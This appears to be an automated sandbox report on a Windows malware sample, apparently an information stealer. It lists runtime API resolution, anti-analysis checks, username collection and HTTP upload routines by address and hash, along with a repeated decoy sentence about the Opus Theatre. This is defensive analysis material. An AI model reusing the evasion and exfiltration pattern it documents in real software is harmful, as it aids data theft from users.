                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 
United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 2127927946-2218711628
                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 673 419b46-419b4d 672->673 674 419b16-419b41 GetProcAddress * 2 672->674 676 419b68-419b6f 673->676 677 419b4f-419b63 GetProcAddress 673->677 674->673 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,008587A0), ref: 004198A1
                                  • GetProcAddress.KERNEL32(75900000,008587B8), ref: 004198BA
                                  • GetProcAddress.KERNEL32(75900000,00858860), ref: 004198D2
                                  • GetProcAddress.KERNEL32(75900000,008588A8), ref: 004198EA
                                  • GetProcAddress.KERNEL32(75900000,008587D0), ref: 00419903
                                  • GetProcAddress.KERNEL32(75900000,00883690), ref: 0041991B
                                  • GetProcAddress.KERNEL32(75900000,00856478), ref: 00419933
                                  • GetProcAddress.KERNEL32(75900000,00856658), ref: 0041994C
                                  • GetProcAddress.KERNEL32(75900000,00858908), ref: 00419964
                                  • GetProcAddress.KERNEL32(75900000,00858830), ref: 0041997C
                                  • GetProcAddress.KERNEL32(75900000,00883A98), ref: 00419995
                                  • GetProcAddress.KERNEL32(75900000,008838D0), ref: 004199AD
                                  • GetProcAddress.KERNEL32(75900000,008564F8), ref: 004199C5
                                  • GetProcAddress.KERNEL32(75900000,00883AB0), ref: 004199DE
                                  • GetProcAddress.KERNEL32(75900000,00883B40), ref: 004199F6
                                  • GetProcAddress.KERNEL32(75900000,008564D8), ref: 00419A0E
                                  • GetProcAddress.KERNEL32(75900000,00883918), ref: 00419A27
                                  • GetProcAddress.KERNEL32(75900000,008839F0), ref: 00419A3F
                                  • GetProcAddress.KERNEL32(75900000,00856678), ref: 00419A57
                                  • GetProcAddress.KERNEL32(75900000,008838E8), ref: 00419A70
                                  • GetProcAddress.KERNEL32(75900000,00856498), ref: 00419A88
                                  • LoadLibraryA.KERNEL32(00883930,?,00416A00), ref: 00419A9A
                                  • LoadLibraryA.KERNEL32(00883AC8,?,00416A00), ref: 00419AAB
                                  • LoadLibraryA.KERNEL32(00883AE0,?,00416A00), ref: 00419ABD
                                  • LoadLibraryA.KERNEL32(00883B28,?,00416A00), ref: 00419ACF
                                  • LoadLibraryA.KERNEL32(008838B8,?,00416A00), ref: 00419AE0
                                  • GetProcAddress.KERNEL32(75070000,00883B10), ref: 00419B02
                                  • GetProcAddress.KERNEL32(75FD0000,00883A80), ref: 00419B23
                                  • GetProcAddress.KERNEL32(75FD0000,00883A38), ref: 00419B3B
                                  • GetProcAddress.KERNEL32(75A50000,00883A50), ref: 00419B5D
                                  • GetProcAddress.KERNEL32(74E50000,008565B8), ref: 00419B7E
                                  • GetProcAddress.KERNEL32(76E80000,00883750), ref: 00419B9F
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00419BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                  • StrCmpCA.SHLWAPI(?,0088C4D8), ref: 0040493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0088C548), ref: 00404DE8
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                  • HttpOpenRequestA.WININET(00000000,0088C458,?,0088BFB8,00000000,00000000,00400100,00000000), ref: 00404B15
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 2402878923-2180234286
                                  • Opcode ID: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                  • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                  • Opcode Fuzzy Hash: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                  • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocNameProcessUser
                                  • String ID:
                                  • API String ID: 1206570057-0
                                  • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                  • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                  • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                  • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                  APIs
                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                  • ExitProcess.KERNEL32 ref: 0040117E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                  • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                  • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                  • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,008563F8), ref: 00419C2D
                                  • GetProcAddress.KERNEL32(75900000,008566D8), ref: 00419C45
                                  • GetProcAddress.KERNEL32(75900000,00883C00), ref: 00419C5E
                                  • GetProcAddress.KERNEL32(75900000,00883B70), ref: 00419C76
                                  • GetProcAddress.KERNEL32(75900000,00883BA0), ref: 00419C8E
                                  • GetProcAddress.KERNEL32(75900000,00883B88), ref: 00419CA7
                                  • GetProcAddress.KERNEL32(75900000,00885A88), ref: 00419CBF
                                  • GetProcAddress.KERNEL32(75900000,00883BE8), ref: 00419CD7
                                  • GetProcAddress.KERNEL32(75900000,00883BB8), ref: 00419CF0
                                  • GetProcAddress.KERNEL32(75900000,00883C18), ref: 00419D08
                                  • GetProcAddress.KERNEL32(75900000,00883B58), ref: 00419D20
                                  • GetProcAddress.KERNEL32(75900000,008566F8), ref: 00419D39
                                  • GetProcAddress.KERNEL32(75900000,00856438), ref: 00419D51
                                  • GetProcAddress.KERNEL32(75900000,00856618), ref: 00419D69
                                  • GetProcAddress.KERNEL32(75900000,00856798), ref: 00419D82
                                  • GetProcAddress.KERNEL32(75900000,0088A300), ref: 00419D9A
                                  • GetProcAddress.KERNEL32(75900000,0088A168), ref: 00419DB2
                                  • GetProcAddress.KERNEL32(75900000,008859E8), ref: 00419DCB
                                  • GetProcAddress.KERNEL32(75900000,00856538), ref: 00419DE3
                                  • GetProcAddress.KERNEL32(75900000,0088A330), ref: 00419DFB
                                  • GetProcAddress.KERNEL32(75900000,0088A0A8), ref: 00419E14
                                  • GetProcAddress.KERNEL32(75900000,0088A318), ref: 00419E2C
                                  • GetProcAddress.KERNEL32(75900000,0088A1B0), ref: 00419E44
                                  • GetProcAddress.KERNEL32(75900000,00856578), ref: 00419E5D
                                  • GetProcAddress.KERNEL32(75900000,0088A1F8), ref: 00419E75
                                  • GetProcAddress.KERNEL32(75900000,0088A360), ref: 00419E8D
                                  • GetProcAddress.KERNEL32(75900000,0088A270), ref: 00419EA6
                                  • GetProcAddress.KERNEL32(75900000,0088A210), ref: 00419EBE
                                  • GetProcAddress.KERNEL32(75900000,0088A108), ref: 00419ED6
                                  • GetProcAddress.KERNEL32(75900000,0088A1C8), ref: 00419EEF
                                  • GetProcAddress.KERNEL32(75900000,0088A240), ref: 00419F07
                                  • GetProcAddress.KERNEL32(75900000,0088A348), ref: 00419F1F
                                  • GetProcAddress.KERNEL32(75900000,0088A0D8), ref: 00419F38
                                  • GetProcAddress.KERNEL32(75900000,00885470), ref: 00419F50
                                  • GetProcAddress.KERNEL32(75900000,0088A2E8), ref: 00419F68
                                  • GetProcAddress.KERNEL32(75900000,0088A078), ref: 00419F81
                                  • GetProcAddress.KERNEL32(75900000,00856598), ref: 00419F99
                                  • GetProcAddress.KERNEL32(75900000,0088A180), ref: 00419FB1
                                  • GetProcAddress.KERNEL32(75900000,008565D8), ref: 00419FCA
                                  • GetProcAddress.KERNEL32(75900000,0088A2B8), ref: 00419FE2
                                  • GetProcAddress.KERNEL32(75900000,0088A1E0), ref: 00419FFA
                                  • GetProcAddress.KERNEL32(75900000,008565F8), ref: 0041A013
                                  • GetProcAddress.KERNEL32(75900000,008561D8), ref: 0041A02B
                                  • LoadLibraryA.KERNEL32(0088A0C0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                  • LoadLibraryA.KERNEL32(0088A288,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                  • LoadLibraryA.KERNEL32(0088A090,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                  • LoadLibraryA.KERNEL32(0088A258,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                  • LoadLibraryA.KERNEL32(0088A2A0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                  • LoadLibraryA.KERNEL32(0088A0F0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                  • LoadLibraryA.KERNEL32(0088A120,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                  • LoadLibraryA.KERNEL32(0088A138,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                  • GetProcAddress.KERNEL32(75FD0000,00855FF8), ref: 0041A0DA
                                  • GetProcAddress.KERNEL32(75FD0000,0088A228), ref: 0041A0F2
                                  • GetProcAddress.KERNEL32(75FD0000,008836C0), ref: 0041A10A
                                  • GetProcAddress.KERNEL32(75FD0000,0088A150), ref: 0041A123
                                  • GetProcAddress.KERNEL32(75FD0000,008563B8), ref: 0041A13B
                                  • GetProcAddress.KERNEL32(73B30000,008857E0), ref: 0041A160
                                  • GetProcAddress.KERNEL32(73B30000,00856118), ref: 0041A179
                                  • GetProcAddress.KERNEL32(73B30000,00885A10), ref: 0041A191
                                  • GetProcAddress.KERNEL32(73B30000,0088A198), ref: 0041A1A9
                                  • GetProcAddress.KERNEL32(73B30000,0088A2D0), ref: 0041A1C2
                                  • GetProcAddress.KERNEL32(73B30000,00856018), ref: 0041A1DA
                                  • GetProcAddress.KERNEL32(73B30000,008561B8), ref: 0041A1F2
                                  • GetProcAddress.KERNEL32(73B30000,0088A438), ref: 0041A20B
                                  • GetProcAddress.KERNEL32(763B0000,00856338), ref: 0041A22C
                                  • GetProcAddress.KERNEL32(763B0000,008563D8), ref: 0041A244
                                  • GetProcAddress.KERNEL32(763B0000,0088A3F0), ref: 0041A25D
                                  • GetProcAddress.KERNEL32(763B0000,0088A3A8), ref: 0041A275
                                  • GetProcAddress.KERNEL32(763B0000,008561F8), ref: 0041A28D
                                  • GetProcAddress.KERNEL32(750F0000,00885AD8), ref: 0041A2B3
                                  • GetProcAddress.KERNEL32(750F0000,00885880), ref: 0041A2CB
                                  • GetProcAddress.KERNEL32(750F0000,0088A3D8), ref: 0041A2E3
                                  • GetProcAddress.KERNEL32(750F0000,00856038), ref: 0041A2FC
                                  • GetProcAddress.KERNEL32(750F0000,00856138), ref: 0041A314
                                  • GetProcAddress.KERNEL32(750F0000,00885AB0), ref: 0041A32C
                                  • GetProcAddress.KERNEL32(75A50000,0088A408), ref: 0041A352
                                  • GetProcAddress.KERNEL32(75A50000,00856158), ref: 0041A36A
                                  • GetProcAddress.KERNEL32(75A50000,00883740), ref: 0041A382
                                  • GetProcAddress.KERNEL32(75A50000,0088A420), ref: 0041A39B
                                  • GetProcAddress.KERNEL32(75A50000,0088A378), ref: 0041A3B3
